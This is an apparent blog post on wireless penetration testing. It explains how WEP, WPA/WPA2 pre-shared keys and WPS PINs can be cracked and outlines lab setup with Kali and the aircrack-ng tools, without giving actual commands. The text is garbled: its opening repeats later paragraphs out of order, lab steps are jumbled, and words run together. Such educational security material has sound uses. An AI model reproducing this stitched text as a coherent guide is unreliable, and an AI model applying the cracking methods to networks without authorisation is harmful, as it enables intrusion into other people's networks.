First Of All To Hack You Should Have To Hack Yourself First.....................
Hack Yourself First
(WEP) encryption became popularand accessing the network now required an encryption key. Unfortunately, there were manyflaws in the WEP protocol, which made it trivially easy to crack the WEP key and join the network.Now, most wireless networks use Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access 2(WPA2) in pre-shared key (PSK) mode. The WPA/WPA2 protocol is a much better protocol but itcan still be cracked if a weak PSK is used. To prevent users from creating weak PSKs, the Wi-FiAlliance developed the Wi-Fi Protected Setup (WPS) protocol, which allows a wireless access point (WAP) to be preconfigured with a strong PSK and allows a user to join the network by providing a PIN number instead of a password. Unfortunately, this protocol also has weaknesses that could allow the PIN to be guessed in a matter of hours.
To prevent this type of attack, WEP adds a random initialization vector (IV) to the WEP key before generating the key stream. Unfortunately, the IV is only 24 bits long so it is possible to force IV collisions and create duplicate key streams. Data encrypted with the duplicate key streams can be used to recover the plaintext WEP password.
The WPA/WPA2 protocol uses a four-way handshake to ensure both the client and the WAP have all the necessary information to calculate the dynamic key. By capturing the four-way handshake, the tester can obtain the nonce values and the dynamic key. At this point, the tester can calculate dynamic keys using many different passwords. If the calculated key and
the captured key match, the password used to calculate the key is the correct PSK.
To help users make the transition to the more secure WPA/WPA2 protocol, the Wi-Fi Alliance developed the WPS protocol. With the WPS protocol, a WAP can be preconfigured with WPA2 and a strong PSK and can share its configuration with a new device that wants to join the network. To prove that a device is authorized to receive the configuration and join the network, the device must provide a PIN number to the WAP. The PIN number is preconfigured on the WAP and should be unique to the WAP. The PIN number is eight digits long, which means it is
impractical to brute-force it. Unfortunately, the protocol was poorly designed and each half of
the PIN is verified independently, which means the tester need only brute-force two four-digit
numbers, which is much easier.
In addition, the last digit of the PIN is a checksum calculated
from the first seven digits. This means the tester only needs to brute-force a four-digit number and
a three-digit number. The combination of these flaws allows a WPS PIN to be brute-forced in a
matter of hours depending on whether the WAP manufacturer has implemented any bruteforce
mitigations.
Now we will start it................
3. From the USB Devices menu, select the correct wireless card.
2. From the Devices menu, select the correct wireless card.
Next, use Airmon-ng to put the wireless interface in monitor mode. The Airmon-ng tool takes an optional channel argument. If a channel is not specified then it will choose one. For now, it is fine to allow Airmon-ng to choose a channel. Note the message about processes that may cause trouble with the monitor interface.
Hack Yourself First
Wireless Testing
Wireless networks are often an easy way to gain access to the internal network from an externavantage point. Years ago, most wireless networks were open, meaning users joining the networkwere not required to login. Then wired equivalency protocol(WEP) encryption became popularand accessing the network now required an encryption key. Unfortunately, there were manyflaws in the WEP protocol, which made it trivially easy to crack the WEP key and join the network.Now, most wireless networks use Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access 2(WPA2) in pre-shared key (PSK) mode. The WPA/WPA2 protocol is a much better protocol but itcan still be cracked if a weak PSK is used. To prevent users from creating weak PSKs, the Wi-FiAlliance developed the Wi-Fi Protected Setup (WPS) protocol, which allows a wireless access point (WAP) to be preconfigured with a strong PSK and allows a user to join the network by providing a PIN number instead of a password. Unfortunately, this protocol also has weaknesses that could allow the PIN to be guessed in a matter of hours.
Cracking WEP
WEP uses the RC4 stream cipher and a WEP key to generate the key stream that is used to encrypt the packets on the network. Since all the clients on the network use the same WEP key the same key stream will eventually be used for two different ciphertexts. When two different ciphertexts are encrypted with the same key stream, it is often possible to determine some of the plaintext using statistical analysis. As the number of ciphertexts encrypted with the same key stream increases, the likelihood of decryption increases. Once one plaintext is obtained, it is trivial to obtain the rest of the plain text.
To prevent this type of attack, WEP adds a random initialization vector (IV) to the WEP key before generating the key stream. Unfortunately, the IV is only 24 bits long so it is possible to force IV collisions and create duplicate key streams. Data encrypted with the duplicate key streams can be used to recover the plaintext WEP password.
Cracking WPA/WPA2 (Pre-Shared Key)
WPA and WPA2 both support a variety of authentication protocols but the only one that is feasible to crack is WPA/WPA2 Personal, which uses a pre-shared key (PSK). With WEP, the WEP key was used along with the IV to create a static encryption key that was used throughout the wireless session. With WPA/WPA2 Personal, a dynamic key is created for each session during authentication. The dynamic key is generated by concatenating the PSK, a random nonce from the client, a random nonce from the AP, the client MAC address, and the AP MAC address then sending the concatenated value through the PBKDF2 function using the SSID as a salt.The WPA/WPA2 protocol uses a four-way handshake to ensure both the client and the WAP have all the necessary information to calculate the dynamic key. By capturing the four-way handshake, the tester can obtain the nonce values and the dynamic key. At this point, the tester can calculate dynamic keys using many different passwords. If the calculated key and
the captured key match, the password used to calculate the key is the correct PSK.
Cracking Wi-Fi Protected Setup (WPS)
To help users make the transition to the more secure WPA/WPA2 protocol, the Wi-Fi Alliance developed the WPS protocol. With the WPS protocol, a WAP can be preconfigured with WPA2 and a strong PSK and can share its configuration with a new device that wants to join the network. To prove that a device is authorized to receive the configuration and join the network, the device must provide a PIN number to the WAP. The PIN number is preconfigured on the WAP and should be unique to the WAP. The PIN number is eight digits long, which means it is
impractical to brute-force it. Unfortunately, the protocol was poorly designed and each half of
the PIN is verified independently, which means the tester need only brute-force two four-digit
numbers, which is much easier.
In addition, the last digit of the PIN is a checksum calculated
from the first seven digits. This means the tester only needs to brute-force a four-digit number and
a three-digit number. The combination of these flaws allows a WPS PIN to be brute-forced in a
matter of hours depending on whether the WAP manufacturer has implemented any bruteforce
mitigations.
Now we will start it................
Wireless Testing Labs
These labs are designed to teach the student how to use the Aircracking suite of tools and Wifite to attack wireless networks. To complete these labs, the USB wireless card needs to be passed through to the virtual machine. Follow the instructions below to configure Kali Linux to use the USB wireless card.VirtualBox
1. From the VirtualBox menu, select Devices.
2. From the Devices menu, select USB Devices.3. From the USB Devices menu, select the correct wireless card.
VMware Player:
1. From the Player menu, select Removable Devices.2. From the Devices menu, select the correct wireless card.
Lab 1 – Capture Wireless Packets
The goal of this lab is to confirm that Kali Linux can use the wireless card and can inject packets into the wireless network. This lab must be completed successfully before the remaining labs can be started. Start by using Iwconfig to find the wireless interface.
Finally, use the Aireplay-ng command to test packet injection.
after this watch my next post................